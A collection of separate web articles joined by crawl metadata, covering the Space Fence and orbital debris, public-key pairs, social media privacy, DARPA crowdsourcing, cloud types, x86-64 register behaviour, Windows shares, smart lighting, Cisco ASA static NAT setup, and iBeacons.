|1. "The Intelligent Network: Dynamically Managing Bandwidth at the Optical Level," Gaylord Hart and Steven Robinson, NCTA 2005 Technical Papers: Proceedings of the 54th Annual Convention and International Exposition of the National Cable & Telecommunications Association, April 4, 2005, San Francisco, Calif.|
|2. "The Dynamic Network: Managing Bandwidth and Content on Demand at the Optical Level," Gaylord Hart and Zouheir Mansourati, Proceedings Manual: Collected Technical Papers of the 2004 SCTE Conference on Emerging Technologies, January 15, 2004, Dallas, Texas.|
|3. "The MPLS FAQ," maintained by Irwin Lazar, The MPLS Resource Center, http://www.mplsrc.com/mplsfaq.shtml.| | <urn:uuid:e3579ea5-7e02-4e67-ae3b-a08ac675c700> | CC-MAIN-2017-04 | https://www.cedmagazine.com/article/2006/04/automating-optical-networks | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280364.67/warc/CC-MAIN-20170116095120-00554-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.919255 | 2,231 | 3.359375 | 3 |
Some work has begun on tracking and detecting the overabundance of space junk which has become a growing priority as all manner of satellites, rockets and possible commercial space shots are promised in the coming few years.
Today Northrop Grumman said it grabbed $30 million from the USAir Force to start developing the first phase of a global space surveillance ground radar system. The new S-Band Space Fence is part of the Department of Defense's effort to track and detect what are known as resident space objects (RSO), consisting of thousands of pieces of space debris as well as commercial and military satellites. The new Space Fence will replace the current VHF Air Force Space Surveillance System built in 1961.
According to GlobalSecurity.org., the current Space Fence includes nine sites located on a path across the southern United States from Georgia to California along the 33rd parallel and consists of three (3) transmitter and six (6) receiver sites. The main transmitting station located at Lake Kickapoo, Texas, has an average power output of 766,800 watts feeding a two-mile long antenna array. It provides the primary source of illumination. Two other transmitting stations are located at Jordan Lake, Alabama, and Gila River, Arizona. These stations, with average power output of approximately 40,000 watts each, improve low altitude illumination at the sides of the main beam.
Australia is a candidate for the first new Space Fence location. Two additional sites in other parts of the world are also under consideration, Northrop stated
The Space Fence will provide continuous space situational awareness by detecting smaller objects in low and medium earth orbit. The current system requires constant sustainment intervention to maintain operations and does not address the growing population of small and micro satellites in orbit, Northrop stated.
"The new Space Fence system will provide better accuracy and faster detection while allowing us to increase the number of satellites and other space objects that can be detected and tracked, thus avoiding collision and damage to other satellites," said Rich Davis, director of special projects at Northrop Grumman's Advanced Concepts and Technology Division.
The need for such a system seems obvious especially since the Iridium satellite smacked into an inactive Russian Cosmos-2251 military satellite in February. In April, NASA’s Nicholas Johnson, Chief Scientist for Orbital Debris at the Johnson Space Center told a congressional hearing that the United States Space Surveillance Network, managed by U.S. Strategic Command, is tracking more than 19,000 objects in orbit about the Earth, of which approximately 95 percent represent some form of debris. However, these are only the larger pieces of space debris, typically four inches or more in diameter. The number of debris as small as half an inch exceeds 300,000. Due to the tremendous energies possessed by space debris, the collision between a piece of debris only a half-inch in diameter and an operational spacecraft, piloted by humans or robotic, has the potential for catastrophic consequences, he stated.
The near-Earth space debris environment ranges in altitude from 100 to more than 20,000 miles above Earth, and the debris itself ranges in mass from less than an ounce to many tons. Consequently, this population of space debris is a matter of growing concern for all space-faring nations, Johnson stated.
According to Johnson, during 2008, NASA twice maneuvered robotic spacecraft of the Earth Observation System in low Earth orbit and once maneuvered a Tracking and Data Relay Satellite in geosynchronous orbit to avoid potential collisions. Twice since last August, the International Space Station has conducted collision avoidance maneuvers.
For the 35 years from mid-1961 to mid-1996, the population of cataloged objects that are four inches in size or larger in Earth orbit increased at an average rate of 270 per year. However, with the concerted efforts of the major space-faring nations of the world, the rate dropped dramatically to only 70 per year for the next decade.
Unfortunately, the intentional destruction of the Chinese Fengyun-1C weather satellite in January of 2007 and the accidental collision of American and Russian spacecraft in February of this year have increased the cataloged debris population by nearly 40%, in comparison with all the debris remaining from the first 50 years of the Space Age, Johnson stated.
Layer 8 in a box
Check out these other hot stories: | <urn:uuid:4541763d-a957-49ec-8d70-1ab28380f4c1> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2236436/data-center/shiny-new-space-fence-to-monitor-orbiting-junk--satellites.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281084.84/warc/CC-MAIN-20170116095121-00214-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.936845 | 883 | 2.8125 | 3 |
22.214.171.124 Who needs a key pair?
Anyone who wishes to sign messages or to receive encrypted messages must have a key pair. People may have more than one key pair. In fact, it is advisable to use separate key pairs for signing messages and receiving encrypted messages. As another example, someone might have a key pair affiliated with his or her work and a separate key pair for personal use. Other entities may also have key pairs, including electronic entities such as modems, workstations, web servers (web sites) and printers, as well as organizational entities such as a corporate department, a hotel registration desk, or a university registrar's office. Key pairs allow people and other entities to authenticate (see Question 2.2.2) and encrypt messages.
Corporations may require more than one key pair for communication. They may use one or more key pairs for encryption (with the keys stored under key escrow to safeguard the key in event of loss) and use a single non-escrowed key pair for authentication. The lengths of the encryption and authentication key pairs may be varied according to the desired security. | <urn:uuid:116d0799-bba5-442e-a8af-e982bb9112c3> | CC-MAIN-2017-04 | https://www.emc.com/emc-plus/rsa-labs/standards-initiatives/who-needs-a-key-pair.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280239.54/warc/CC-MAIN-20170116095120-00178-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.930115 | 234 | 3 | 3 |
The use of social media can increase consumer vulnerability to identity theft because of the amount and type of personal information people share on these networks. However, consumers do little or nothing to protect themselves, according to a recent study by the Ponemon Institute.
Although more than 80 percent of study respondents expressed concern about their security while using social media, more than half of these same individuals admitted they do not take any steps to actively protect themselves.
This data clearly demonstrates that while people may acknowledge that security is important, many do nothing to protect their information online.
Other key findings from the survey include the following:
- Approximately 65 percent of users do not set high privacy or security settings in their social media sites.
- Approximately 40 percent of all respondents share their physical home address through social media applications.
- Surprisingly, people who have been victims of identity theft are just as likely to be lax in securing their personal information online. Study results from identity theft victims and non-victims are virtually identical.
Even though most respondents expressed concern about online security and privacy, nearly 90 percent did not feel that identity theft is a likely risk from using social media sites. Accordingly, individuals continue to use social media despite acknowledged potential dangers.
- More than 60 percent of users are either not confident or unsure of their social media provider’s ability to protect their identity
- Approximately 44 percent of individuals said if they discovered that a social media provider did not adequately protect their privacy or security, they would continue to use the site
- Nearly 60 percent of respondents are either not confident or unsure that their network of social media friends only includes people they know and can trust. | <urn:uuid:e3097bcc-8b7a-4800-a4f9-674084e36682> | CC-MAIN-2017-04 | https://www.helpnetsecurity.com/2010/06/21/the-truth-about-social-media-identity-theft/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00572-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.93851 | 335 | 3.15625 | 3 |
State and local governments have learned about the benefits of crowdsourcing and today use the power of the public to get new ideas, speed up development times and launch new applications. But the federal government is using crowdsourcing too -- to develop their design tools and build a tank. The Defense Advanced Research Projects Agency (DARPA) started a new program called Adaptive Vehicle Make (AVM), which includes using the public to test the agency’s design tools and submit their designs. More than 1,000 people contributed their powertrain and suspension designs to the first phase of the "Fast, Adaptable, Next-Generation Ground Vehicle" (FANG) project, a challenge to build an amphibious attack vehicle.
The first phase of the FANG challenge ended on April 15. On April 22, a winner was chosen and awarded a one million dollar prize. The next phase of the project, FANG 2, will begin in 2014 and focus on the chassis and survivability of the vehicle. In 2015, FANG 3 will focus on designing an entire vehicle from scratch.
While state and local governments have found crowdsourcing an effective way of engaging citizens and setting budget priorities, DARPA is using crowdsourcing as a way to speed up the development process while refining its design tools. “AVM is ultimately all about how do we compress that development timeline of a complex system for military application,” said Army Lt. Col. Nathan Wiedenman, AVM program manager. “For me and for DARPA, the challenge was an opportunity to put the tools at their current state of development through their paces, test them at scale, get a lot of eyes looking at them and help us make them better. But we will continue to develop those tools and expand their capability over the future design iterations of FANG 2, FANG 3.”
The tools offered by DARPA include design, development, and verification software tools. Participants from the public design and model their concepts and get feedback from an analytical and manufacturability standpoint. While FANG is being used as a guinea pig to develop the AVM program, it may eventually be refined to meet the standards of the Marine Corps, Wiedenman said.
Now that the first phase of the FANG challenge is complete, the DARPA build team based at Penn State University is working on building their design. “Ordering the parts, materials, getting labor online to build that, actually put it through its paces, put it through physical testing and feed that information coming out of the testing, that empirical test data, back into how well the tools can represent and predict the expected performance behavior of the subsystem being designed.”
Using crowdsourcing may prove to bring costs down, but for now, Wiedenman said, the AVM program is mainly being used as a way to test tools more quickly. Overall, he reports that the program is going as planned.
“We got a lot of feedback, obviously not all of it rainbows and sunshine,” he said. “This is a research and development project and the tools are under development so there are rough edges that we’re continuing to work out, but in general I think the feedback was extremely helpful," Wiedenman added, noting that comments were mostly positive and participants had a good experience.
Image courtesy of DARPA Adaptive Vehicle Make Program. | <urn:uuid:283081b9-7662-4891-8152-94f1d71ca4c4> | CC-MAIN-2017-04 | http://www.govtech.com/technology/Public-Joins-DARPA-In-Tank-Design.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281659.81/warc/CC-MAIN-20170116095121-00388-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.964185 | 699 | 2.625 | 3 |
GCN LAB IMPRESSIONS
Can talking about technology make you smarter?
- By Greg Crowe
- Jun 27, 2011
You can debate whether technology makes us smarter or just gives us more data to process. But apparently, talking about technology could actually improve the human brain.
New findings released by archaeologists at Lund University in Sweden indicate that developing or even communicating about new technologies has led to developments in the way we think and behave as a species.
They discovered that, although homo sapiens have lived on the planet for about 200,000 years, it was only about 100,000 years ago that advanced tool-making technology, for crafting things such as spearheads, came about.
In order to reach that plateau, the study says, increased social interaction had to occur, and over generations, the actual makeup of our brains altered. So, in essence, people getting together, planning and talking about technology had a positive impact on the physical structure of our brains — that is, talking about it made us naturally smarter.
And each generation was more adapted to the new technology than the last and, hence, smarter still.
Evidence of this exists today. Anyone who has ever witnessed a preteen teaching his or her grandparents how to get online to check their e-mail or even program their digital video recorder will tell you that the new generation tends to be more tech-savvy than the one before it.
Some could argue that it is simply that younger generations are exposed to technology at an earlier age, thus making them more practiced. And although that might be true to a certain extent, these new findings seem to indicate that there is also a biological predilection for younger generations to be smarter than older ones.
Of course, any live experiment to prove this would no doubt involve raising control subject children in isolation and periodically introducing technology to them to see what they do with it. And that would probably get the torch-and-pitchfork crowd chasing after the scientist in charge of said experiment.
But if anyone does decide to run such an experiment, it would be an ideal environment to also run my long-term cell phone exposure effects experiment. Wait...torches...pitchforks...on second thought, forget I said anything.
So in light of these new findings, the staff here at GCN will continue doing what we have done for the past 29 years: talk about technology and contribute to ultimately making the human species smarter.
You are welcome.
Greg Crowe is a former GCN staff writer who covered mobile technology. | <urn:uuid:2ce76044-2a6f-48c4-8418-2df0bc406980> | CC-MAIN-2017-04 | https://gcn.com/articles/2011/06/27/talking-about-technology-makes-you-smarter.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282110.46/warc/CC-MAIN-20170116095122-00232-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.963469 | 522 | 2.734375 | 3 |
Cloud computing has become ubiquitous for businesses of all sizes, and it offers benefits around scalability, ease of use, fast time-to-market and flexible costs. But cloud isn’t a one-size-fits-all solution, and different workloads perform better in different infrastructure configurations.
IT teams and business decision makers are tasked with determining which type of cloud will work best for their technology requirements, while also finding cloud providers that offer a wide range of deployment options. Understanding the difference between public cloud and private cloud is critical to making the right infrastructure decisions.
Definitions: Public cloud vs private cloud
How do you decide which cloud option is right for you? Let’s look at the definition of public and private cloud along with a few use case examples.
Public cloud allows customers to instantly provision cloud instances via an online portal. As a utility compute model, public cloud provides an accessible, cost-effective cloud deployment option that can be accessed on a pay-as-you-go basis with no upfront investment required.
The flexible billing model with no contract commitment is beneficial for small businesses and other organizations that may only need a cloud server for a limited amount of time, such as for development or testing purposes. The scalability and elasticity offered by public cloud can accommodate changing workload sizes and allow customers to spin servers up and down as needed.
Customization & control
The public cloud is a multi-tenant environment where the hardware and network resources are shared across customers. All hardware and associated networking are located in a data center where they are maintained by the cloud service provider, which reduces the management burden on the customer. However, because of the commoditized nature of public clouds, customization and control is limited. This can be problematic for organizations with strict security or compliance requirements if the cloud provider doesn’t offer specific hardware or operating systems that meet the company’s needs.
Public cloud offerings are typically viewed as virtualized instances, but in recent years, some providers have begun offering both virtual and bare-metal cloud. Bare-metal servers are not virtualized and do not have a hypervisor, which allows organizations to customize the server to their specifications. Cloud computing operating systems such as OpenStack offer the ability to create and manage cloud instances from the same online management portal.
Common use cases for public cloud include web servers, testing and development, and other scenarios where enhanced security requirements are not needed.
Private cloud offers a single-tenant environment where hardware, network and IT equipment is entirely dedicated to one customer. While the initial investment and ongoing maintenance for private cloud is more expensive than public cloud, organizations have the ability to customize their environment to meet exact specifications.
A highly customized, dedicated environment is often required by businesses that must adhere to industry-wide security or compliance regulations, such as HIPAA, HITECH or PCI-DSS. To be compliant, many healthcare, finance and ecommerce companies are required to have an infrastructure with higher levels of data protection and security than a commodity public cloud can provide.
Private cloud hosting solutions give customers significant control over their environment, including the hardware, operating system and other equipment. However, increased customization and control also shifts the burden of maintenance and management to the customer. This is one of the main trade-offs between public and private cloud; organizations that require more hands-on access and customization must also take on the responsibility of managing it.
Common use cases for private cloud include secure online systems with controlled access, protection of personally identifiable information and credit card data, and meeting compliance requirements around HIPAA, HITECH or PCI-DSS.
A hybrid approach
Public cloud and private cloud are not mutually exclusive, and most businesses need to use a mix of different infrastructure solutions to meet workload and application requirements. Hybrid cloud solutions refer to any combination of public, private, third-party or on-premise cloud services within the same environment.
Using one provider that offers public, private and hybrid cloud can be a cost-effective way to meet scalability, performance and security requirements. If an organization is transferring data between a private cloud located in California and a public cloud facility in New York, the latency created by distance can impact network performance. Choosing a provider that offers private and public clouds in close proximity to each other or even within the same facility can reduce latency and improve performance throughout the infrastructure stack.
So how can you determine which type of cloud is best for your needs? Download the Cloud Buyer’s Guide to learn more. | <urn:uuid:0ba05fbb-74b0-4521-8754-20efe130be31> | CC-MAIN-2017-04 | http://www.internap.com/2016/01/28/public-cloud-vs-private-cloud/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279657.18/warc/CC-MAIN-20170116095119-00380-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.939089 | 920 | 2.53125 | 3 |
A few days ago I was working on the x86 IDA module. The goal
was to have it recognize jump tables for 64-bit processors.
This is routine: we have to add new instruction idioms to the
analysis engine from time to time to keep up with new compilers.
I was typing in the patterns and hoping
that the tests would go smoothly at the first run.
But one of the patterns puzzled me. It didn’t look good. Such
a code could not run and would randomly crash. The reason was that the processor was using
a register without fully initializing it. Yet I knew that the code worked since it came
from a real world application. Besides the code was compiler-generated and
such code is usually very robust.
The code was using the movzx instruction to copy a value from one register
to another. Something like this:
movzx eax, bl
Here the value in the bl register (8bits) is copied to the eax register (32bits).
The upper bits 24 bits of the eax register are set to zeroes during the copy.
After that the code was using the rax register (64-bit):
mov eax, offset[rcx+rax*4]
However, the high 32bits of the rax register are not initialized and may contain anything!
Code like this is doomed to crash… how come it works?!
I think you guessed it: the movzx instruction initializes the whole rax register.
Its companion instruction, movsx, behaves even more strangely. For example,
if rax=-1 and bl=0x80, after the execution of
movsx eax, bl
rax is equal to 0x00000000FFFFFF80.
Igor Skochinsky solved this mystery for me. It turns out that the results of
all 32 bit computations in the 64 bit mode are silently zero extended to 64 bits.
(note for the future: always read the manuals from the first to the last page! 😉
I don’t know why 32 bit destinations are singled out (16 bit and 8 bit results
are not zero extended), but it is nice to know about this particularity of x86 processors. | <urn:uuid:4ccd3233-f7a4-402d-8d79-59c813bf7c6a> | CC-MAIN-2017-04 | http://www.hexblog.com/?p=45 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280899.42/warc/CC-MAIN-20170116095120-00104-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.934188 | 477 | 2.734375 | 3 |
Planning a Shared Folder Structure
When you're creating a new network or installing a new file or application server, it's easy to get confused about how to share the resources on the server. There are a couple of schools of thought on the subject. Some administrators like to share everything at the root level and allow NTFS permissions to control access to individual folders. Other administrators prefer to share each data directory or application folder individually. I prefer to use a mixture of these two techniques. In this article, I'll share my thoughts on the subject with you.
Sharing at the Root vs. Sharing Individually
Ideally, your goal is to make the appropriate resources available to the necessary people, while protecting the resources from those who shouldn't be allowed to have access. While both of the techniques that I described above work, they both have flaws when you consider them in terms of your goal.
The situation in which everything is shared individually has problems because each share point is a resource that the server must track. Having too many shares can consume large amounts of memory and processing power, thus slowing your server down. The other danger of having such an arrangement is that it's easy to accidentally overlap shares. For example, suppose that you had a directory called \DATA\A. Now, suppose that you gave the user full access to DATA and read only access to A by using share-level permissions. In such a situation the shares would overlap because A is a subdirectory of DATA. If the user tried to access the A directory through the A share, they would receive the appropriate read-only permissions. If they attempted to go in through the DATA share and drill down to the A directory, they would have full access because of the permissions assigned to the DATA share.
On the other extreme, only having a single share point for each volume and using NTFS to handle security isn't that bad of an idea. However, this approach may make it difficult to navigate to a desired location within the directory structure. Although this approach might work fine for you and for some users, it's not a bad idea to make things easy on the rest of the users by creating a few share points that they can use to directly access frequently used folders. With this approach, it's appropriate to use NTFS permissions instead of share permissions. Whenever I create a share point, I like to set the share permissions to allow everyone to have full access. I handle the security at the NTFS level.
Where to Create Shares
When it comes to creating shares, I usually create one share for each major directory tree or application. For example, suppose that you have a directory called USERS that contains a subdirectory for each user in the domain. I'd create a share point on the users directory so that any user can click on it and then go straight to their data directory. Likewise, if you had a directory that contained the setup files for Microsoft Office, it's not a bad idea to create a share point for that directory. That way, if a user needs to install an optional Microsoft Office component, there's no question about where that component is located. //
Brien M. Posey is an MCSE who works as a freelance writer. His past experience includes working as the director of information systems for a national chain of health care facilities and as a network engineer for the Department of Defense. Because of the extremely high volume of e-mail that Brien receives, it's impossible for him to respond to every message, although he does read them all. | <urn:uuid:e4b8cc6b-3ac2-4b94-8dc9-4c0501e4649d> | CC-MAIN-2017-04 | http://www.enterprisenetworkingplanet.com/print/netsysm/article.php/624941/Planning-a-Shared-Folder-Structure.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281421.33/warc/CC-MAIN-20170116095121-00434-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.958993 | 720 | 2.640625 | 3 |
Imagine you just got a cancer diagnosis. You speak with four highly-regarded physicians and get four conflicting recommendations: chemo, radiation therapy, surgery, and one opinion that recommends a combination of allopathic and complementary medicine. “It would be confusing and hard to make a choice because faced with a cancer diagnosis, if you choose the wrong treatment, you might die. It’s scary,” says Tamara McCleary, the CEO of Thulium.co and futurist who began her career as a registered nurse.
“When you and I get sick, we rely rely on doctor's memory, their education, their personal biases and their emotional state. We are even relying on whether they got enough sleep last night,” McCleary says. “There are all these human variables that can cause any of us to not be top of our game at any point in time—night or day. It is not a criticism. We are human. Human beings make errors.”
Now, picture a world in which doctors are trained in data science. Armed with machine learning, big data, and artificial intelligence, they can consider clinical research from across the globe, weighing the latest research and clinical data in each decision they make. Physicians could consider the likelihood that every possible treatment modality would work for each individual. And they can use technology to base each medical decision on the latest research data available, a patient’s genomics, lab results, and clinical history.
Machines could also weed out ineffective but expensive treatments and help detect the earliest signs of disease. “We can head off problems if we can intervene earlier,” McCleary says. “We know that early intervention is the key to staying healthy, as well as, the key to saving healthcare dollars.”
The IoT Emerge conference will feature a keynote by Tamara McCleary. For a 20% discount, use the code: IOTINFORMEREXPO.
Saving money is crucial. In the United States, medical bills are one of the most common causes of bankruptcies.
“I think that the healthcare industry is primed to be disrupted,” McCleary says. “We are still functioning in an outdated model. Whether the institution of healthcare wants to change or not, it’s buckling under the weight of the financial crisis of rising healthcare costs, and an aging baby boomer population. Technology that can save lives and dollars is the catalyst for disruption in the healthcare sector.”
There are already a number of companies launching artificial intelligence technology in healthcare, ranging from IBM, with its Watson technology, to startups like Enlitic, Wellframe, Ginger.io, MedAware, and Lumiata.
The potential for AI and IoT for the elderly is staggering. The number of Americans that are 65 or older will increase from 35 million in 2000 to 73 million by 2030, predicts the U.S. Census Bureau.
The aging population in the U.S. may already be behind the nation’s stubbornly slow economic growth, argues a team of researchers—Etienne Gagnon, Benjamin Johannsen, and David Lopez-Salido—in a recent paper for the Federal Reserve.
Complicating matters, caring for the elderly can be notoriously expensive as well. A private nursing home room can cost anywhere from $55,000 to $255,000 annually, according to government data. Healthcare spending at large is also a drag on the U.S. economy. In 2014, the country spent 17.5% of its GDP on healthcare expenditures. That works out to nearly $10,000 per person. Meanwhile, outcomes in the United States lag behind most other industrialized nations.
The majority of boomers would prefer to stay in their homes as they age rather than move into a facility. Yet many people—elderly and otherwise—struggle to take their medication as prescribed. U.S. doctors prescribe roughly 3.8 billion drugs annually—half of which are taken incorrectly or are not taken at all. Among the elderly, this noncompliance is the most common reason for admittance to nursing homes.
“Imagine the freedom and independence that personal robots could offer the elderly. Medication and safety problems are the most prominent reasons aging persons are displaced from their homes and placed in care facilities. A personal AI could offer reminders to take medication and even dispense the correct meds,” McCleary says. “Take it a step further with IoT, we have the technology currently where pills have tiny sensors. As the medication is digesting in the patient, it allows family members and physicians to know that the patient took their medication. It’s even time stamped. If they didn’t take it, or took the wrong dosage, an alert would be sent.”
These technologies hold promise for everyone but especially for the elderly and those with chronic disease.
McCleary thinks healthcare need machines to manage the details of caregiving, collecting and reporting important health-related data. Technology can also support patient compliance, provide predictive analytics to keep patients healthier while reducing rising healthcare costs. “Machines will free-up providers to do what they do best,” she says. “Doctors and nurses are critical for preserving the human touch in medicine through a personalized approach to care. When we’re sick, scared, and suffering we need a human being to talk to. Machines free-up doctors and nurses from the things they don’t need to be occupied with, and instead focus on the most important thing of all—human-to-human relationships between care provider and patient.”
“There is this beautiful, unexplainable, human reasoning. When paired with the tools that machines can offer us, it’s better than what we can do alone,” she says. “In the end, everything is about relationships. It is human-to-human relationships, but it is also human-to-machine relationships, and machine-to-machine relationships, and machine to human relationships. These are the relationships we are going to navigate in the future.”
In the end, healthcare, too, is all about relationships. The complex web of relationships spans public and private payers, industry, clinicians, patients, and more. This complexity will likely prohibit healthcare from having a singular 'Uber moment.' But change is coming nonetheless. And each of us can play a role in making it happen. | <urn:uuid:04abcc24-e98b-4676-a4e5-070b4bcbe8cd> | CC-MAIN-2017-04 | http://www.ioti.com/iot-trends-and-analysis/call-911-healthcare-needs-tech-resuscitation | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281492.97/warc/CC-MAIN-20170116095121-00123-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.953491 | 1,344 | 2.65625 | 3 |
Energy efficient LED light bulbs are increasingly replacing incandescent bulbs and, while there are many technical and market challenges to resolve, it is clear that new capabilities and functionalities that transcend far beyond the traditional light bulb are emerging. The future of lighting is changing and taking effect now.
The emergence of smart city programs is putting the smart street lighting at the forefront of municipality roadmaps. Smart lighting solutions will enable cities to cover streets with the correct amount of light, depending on the conditions for which it is needed. While these solutions provide municipalities with the right tools to improve citizens’ satisfaction in terms of security, safety, and wellbeing, they also enable councils to make considerable savings in terms of power consumption and lighting system maintenance. In addition, outdoor lighting infrastructure will increasingly serve as a backbone that will carry a number of IoE applications including monitoring changes in weather, pollution rates, and mapping traffic conditions and flow in specific areas of the city.
Off the back of this, other public domains such as office blocks, retailers, and manufacturing plants are starting to look towards smart, connected lighting to better the working environment for their employees, while also improving productivity and customer experience. Much like smart street lighting, businesses will also see the benefits of energy savings and remote lamp monitoring.
In the residential market, homeowners can, among other things, personalize their smart lights to a color representative of their activity or mood, and remotely control timers to welcome them home or to feign occupancy. These advantages of smart LEDs in the home will aid in the drive towards greater LED usage.
This comprehensive forecasting model takes into account the installed bases of residential and street lighting, as well as a range of different public segments, in various regions around the world. The model looks at how the market is moving towards LEDs and their smart capabilities as well as the evolution of the technologies which are used. | <urn:uuid:eb2c32c2-adf8-4e3f-8703-316f74235705> | CC-MAIN-2017-04 | https://www.abiresearch.com/market-research/product/1026351-smart-lighting/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283301.73/warc/CC-MAIN-20170116095123-00031-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.958417 | 376 | 2.734375 | 3 |
Two of the most common forms of network address translation (NAT) are dynamic port address translation (PAT) and static NAT.
PAT is the many-to-one form of NAT implemented in many small office and home networks where many internal hosts, typically using RFC 1918 addresses such as 192.168.0.0/24, share a single external address on the public Internet. Static NAT is a one-to-one mapping which is used when an internal host needs to be accessible from the public Internet or some other external network.
In this article I'll explain how to configure static NAT to make an internal Web server accessible from an external network. The same concept applies when you want to make any internal server accessible from an external network, whether it's a Web server, a mail server, an FTP server, or any other type of server or device.
Use the following diagram with this documentation. This diagram uses RFC 1918 addresses. In the real world, the outside interface would most likely be configured with a registered, public address.
There are four steps involved in enabling static NAT:
1. Create the network object and static NAT statement. A network object must be created identifying the internal host. Within the network object, you must also create a static NAT statement to identify the outside interface, its IP address, and the type of traffic to be forwarded: object network InternalHost host 192.168.102.5 nat (inside,outside) static interface service tcp 80 80.
2. Create a NAT statement identifying the outside interface. Note that, in the static NAT statement above, the use of the term interface tells NAT to use whatever address is on the outside interface. The first use of 80 identifies the originating port number. The second use of 80 identifies the destination port number.
3. Build the Access-Control List. Build the Access-Control List to permit the traffic flow (this statement goes on a single line): access-list OutsideToWebServer permit tcp any host 192.168.102.5 eq www.
4. Apply the ACL to the outside interface using the Access-Group command: access-group OutsideToWebServer in interface outside. This is the complete configuration:
When successfully implemented, this configuration will permit a host on the outside network, such as the public Internet, to connect to the internal Web server using the address on the ASA's outside interface.
Configuring the ASA with multiple outside interface addresses
It is not possible to assign multiple IP addresses to the outside interface on a Cisco ASA security appliance. It is possible, however, to configure the ASA to forward different outside addresses to different hosts on the inside network.
For example, you have a /29 block of addresses assigned by your ISP. Also, suppose you have a mail server using POP3 and SMTP and a Web server using HTTP and HTTPS on the inside network. You want each of the servers to be reachable via different outside addresses. You can configure static NAT to accomplish this (see diagram, and again, in the real world the outside interface would probably be configured with registered, public addresses instead of the RFC 1918 addresses shown here).
The steps are similar for single-address static NAT configuration:
1. Configure network objects. Configure a network object for each internal host with a static NAT static statement specifying the outside address to be used and the service types (port numbers) to be forwarded. These identify the internal hosts, the desired outside IP address, and the type of service to be forwarded. (The exclamation marks are for formatting to improve readability and are not required for the configuration.)
object network WebServer-HTTP
nat (inside,outside) static 192.168.1.194 service tcp 80 80
object network WebServer-HTTPS
nat (inside,outside) static 192.168.1.194 service tcp 443 443
object network MailServer-SMTP
nat (inside,outside) static 192.168.1.195 service tcp 25 25
object network MailServer-POP3
host 192.168.102.6nat (inside,outside) static 192.168.1.195 service tcp 110 110
Note that in the above configurations the host statement identifies the internal server (192.168.102.5 is the Web server and 192.168.102.6 is the mail server). The NAT statement identifies the external address used to forward the specified packets to the internal host.
2. Configure Access-Control Lists to permit the traffic flows. This Access-Control List permits the traffic flows against the security levels (each access-list statement goes on a single line).
access-list OutsideToInside permit tcp any host 192.168.102.5 eq 80
access-list OutsideToInside permit tcp any host 192.168.102.5 eq 443
access-list OutsideToInside permit tcp any host 192.168.102.6 eq 25access-list OutsideToInside permit tcp any host 192.168.102.6 eq 110
3. Apply the Access-Control List to the outside interface with an access-group statement.
access-group OutsideToInside in interface outside
Here is the complete configuration:
For more information about configuring the Cisco ASA Security Appliance, please see my book "The Accidental Administrator: Cisco ASA Security Appliance," available through Amazon and other resellers or through the soundtraining.net bookstore. Also, consider attending my Cisco ASA Security Appliance 101 workshop, either a public, open-enrollment workshop or available for onsite training at your location with your group. More information is available here. | <urn:uuid:c2edd28d-06e5-4890-9ef1-9be3007c30a4> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2162844/tech-primers/how-to-configure-static-nat-on-a-cisco-asa-security-appliance.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280834.29/warc/CC-MAIN-20170116095120-00151-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.837777 | 1,154 | 3.6875 | 4 |
Now You See It: Simple Visualization Techniques for Quantitative Analysis by Stephen Few.
Before you can present information to others, you must know its story. Now You See It teaches simple, fundamental, and practical techniques that anyone can use to make sense of numbers. These techniques rely on something that almost everyone has—vision—using graphs to discover trends, patterns, and exceptions that reside in quantitative information and interactions with those graphs to uncover what the discoveries mean.
Although some questions about quantitative data can only be answered using sophisticated statistical techniques, most can be answered using simple visualizations—quantitative sense-making methods that can be used by people with little statistical training. Until Now You See It, no book has taught the basic skills of data analysis to such a broad audience and for so many uses, even though the need is huge, critical, and rapidly growing.
You may download a PDF version of the table of contents.
Teachers who wish to consider Now You See It for a course and journalists who wish to review it may request a review copy by emailing Stephen Few directly.
Buy Now You See It. To order 10 or more copies, please email us for information and pricing (we offer discounts on such purchases). | <urn:uuid:20907042-5312-4196-b21c-86fbc70c25bc> | CC-MAIN-2017-04 | http://www.analyticspress.com/nysi.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281574.78/warc/CC-MAIN-20170116095121-00545-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.910787 | 250 | 2.96875 | 3 |
With the advent of iOS 7 came a new technology from Apple called iBeacons. iBeacons provide a significant step forward in the “internet of things.” As technology becomes a more central part of our lives, our devices start to talk to each other more and iBeacons help a device figure out what's nearby and what it can talk to. The context of a device’s location helps make decisions for how devices interact with each other. iBeacons provide a solution to make those decisions, replacing what traditional GPS services have done in the past.
With traditional GPS services, the data is often inaccurate and the service can make inappropriate decisions. School buildings are notorious for interfering with location services, providing location data that is seldom accurate. GPS services do not include things like altitude, so even when the coordinates are correct, it doesn't understand if you are on the 2nd floor or 3rd floor of the high school. Traditional GPS services also carry a liability in student privacy. The service has the potential to save data long term, creating a historical tracking of that device and the student using it, which has been a roadblock for many.
